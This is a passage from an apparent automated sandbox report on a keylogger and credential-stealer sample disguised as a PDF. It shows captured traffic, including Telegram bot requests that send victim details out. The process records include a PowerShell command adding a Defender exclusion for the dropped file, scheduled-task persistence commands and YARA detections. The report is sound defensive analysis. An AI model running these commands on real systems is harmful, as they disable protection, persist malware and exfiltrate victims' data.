                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fnrYoUx0bbJ%2B%2B%2BFi6ultCkrpqGKNh1MB3Sug7VsfrQbcuC3PSBuUClJ%2BHNwgoYXu1oB%2BSkoFjfzFrIpBfz0tRJR1kLs%2FVoE0FuB%2BHtcKZlvwoZLzCbTbjOmbXiadhrFPcLvK3d6m"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d3a2cc2b787-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1383&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1887874&cwnd=106&unsent_bytes=0&cid=8fa6278d558939b2&ts=149&x=0"
                                                                                2024-10-25 07:17:24 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.849744188.114.97.34432788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:25 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-25 07:17:25 UTC896INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:25 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 321
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O4KMRj7Rb76LFCC2QHGB3oSAEkO0qVIZQNjrufyrgD%2FxXzbmNWpp65j4hmI%2FHNcJmMP3pWcCC6nSzK5U03IPGl7v7bJ6k624BcvUmLxRYW5SeDlnjg1%2BeViXe702Ed%2BGimL%2Bizsz"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d440c23474b-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1719&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1685681&cwnd=251&unsent_bytes=0&cid=583017fe5f377ae2&ts=148&x=0"
                                                                                2024-10-25 07:17:25 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.849745188.114.97.34434568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:25 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-25 07:17:25 UTC894INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:25 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 321
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqdK995q15RhpzCR%2Fg%2Fwn6y1JkH8E4zcwkIVFKDzBSJSjTWxpVrI0HFoHcoJgZ0j82fQkWIL532ZFXMpQA7Vh2N4DRg9KkFkVIxMd6%2Flf%2B9Sd7aUfVIDtwj0AKwU0yKHhN7y9YnB"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d448bda2e6f-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1375&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2084953&cwnd=250&unsent_bytes=0&cid=a835b8761d302be6&ts=152&x=0"
                                                                                2024-10-25 07:17:25 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.849747149.154.167.2204432788C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:26 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2025/10/2024%20/%2018:18:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                Host: api.telegram.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-25 07:17:26 UTC344INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0
                                                                                Date: Fri, 25 Oct 2024 07:17:26 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 55
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2024-10-25 07:17:26 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.849749188.114.97.34434568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:27 UTC63OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                2024-10-25 07:17:27 UTC894INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:27 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 323
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YHpH%2B9FIc3AtwlweH%2BTsWZTHwb9xwU40u9bnYuAw6UTOASRNAzJH8ki6T8KMRpEGwMzYC%2BfPdZyC%2B6MyQNdnLI0ekJdSZUtgH01OfbPEIvtbxwSWnITwhese1tPO7C9QfgnHmE1x"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d4edafe6b41-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1093&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2538124&cwnd=250&unsent_bytes=0&cid=40d4557c974f7c56&ts=157&x=0"
                                                                                2024-10-25 07:17:27 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.849751188.114.97.34434568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:29 UTC87OUTGET /xml/173.254.250.81 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-25 07:17:29 UTC886INHTTP/1.1 200 OK
                                                                                Date: Fri, 25 Oct 2024 07:17:29 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                access-control-allow-origin: *
                                                                                vary: Accept-Encoding
                                                                                Cache-Control: max-age=86400
                                                                                CF-Cache-Status: HIT
                                                                                Age: 325
                                                                                Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b4q7by5WTCAVU1vOI0PRAMviPuyNR1CD6f5OY1fTzWZ2t3OUKmo5Xjyupp2gkzc45VIzyq7WtPAT5fHjrlawiYzOOQEK1aPbGNZhZFbYbNM3kFyq8tBchYEz3ErPQuviUJGlw0EP"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d806d5a7d6f6b76-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2059&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1409245&cwnd=251&unsent_bytes=0&cid=0b5f472263126318&ts=162&x=0"
                                                                                2024-10-25 07:17:29 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                2024-10-25 07:17:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.849752149.154.167.2204434568C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-25 07:17:30 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2025/10/2024%20/%2019:57:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                Host: api.telegram.org
                                                                                Connection: Keep-Alive
                                                                                2024-10-25 07:17:30 UTC344INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0
                                                                                Date: Fri, 25 Oct 2024 07:17:30 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 55
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2024-10-25 07:17:30 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:1
                                                                                Start time:03:17:06
                                                                                Start date:25/10/2024
                                                                                Path:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"
                                                                                Imagebase:0xef0000
                                                                                File size:840'712 bytes
                                                                                MD5 hash:D8DAEB11E006370F3B454DF74C382CED
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:03:17:08
                                                                                Start date:25/10/2024
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe"
                                                                                Imagebase:0x700000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:4
                                                                                Start time:03:17:08
                                                                                Start date:25/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6ee680000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:03:17:08
                                                                                Start date:25/10/2024
                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp"
                                                                                Imagebase:0xa50000
                                                                                File size:187'904 bytes
                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:03:17:08
                                                                                Start date:25/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6ee680000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:03:17:08
                                                                                Start date:25/10/2024
                                                                                Path:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"
                                                                                Imagebase:0x300000
                                                                                File size:840'712 bytes
                                                                                MD5 hash:D8DAEB11E006370F3B454DF74C382CED
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:8
                                                                                Start time:03:17:08
                                                                                Start date:25/10/2024
                                                                                Path:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe"
                                                                                Imagebase:0xd30000
                                                                                File size:840'712 bytes
                                                                                MD5 hash:D8DAEB11E006370F3B454DF74C382CED
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.3882761665.0000000003191000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3882761665.0000000003299000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Has exited:false

                                                                                Target ID:9
                                                                                Start time:03:17:08
                                                                                Start date:25/10/2024
                                                                                Path:C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                Imagebase:0xae0000
                                                                                File size:840'712 bytes
                                                                                MD5 hash:D8DAEB11E006370F3B454DF74C382CED
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 26%, ReversingLabs
                                                                                Has exited:true

                                                                                Target ID:10
                                                                                Start time:03:17:10
                                                                                Start date:25/10/2024
                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                Imagebase:0x7ff605670000
                                                                                File size:496'640 bytes
                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:11
                                                                                Start time:03:17:12
                                                                                Start date:25/10/2024
                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp"
                                                                                Imagebase:0xa50000
                                                                                File size:187'904 bytes
                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:12
                                                                                Start time:03:17:12
                                                                                Start date:25/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6ee680000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:13
                                                                                Start time:03:17:12
                                                                                Start date:25/10/2024
                                                                                Path:C:\Users\user\AppData\Roaming\QeSBxb.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Roaming\QeSBxb.exe"
                                                                                Imagebase:0x950000
                                                                                File size:840'712 bytes
                                                                                MD5 hash:D8DAEB11E006370F3B454DF74C382CED
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000D.00000002.3879340417.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                Has exited:false

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:13.2%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:1.9%
                                                                                  Total number of Nodes:159
                                                                                  Total number of Limit Nodes:4
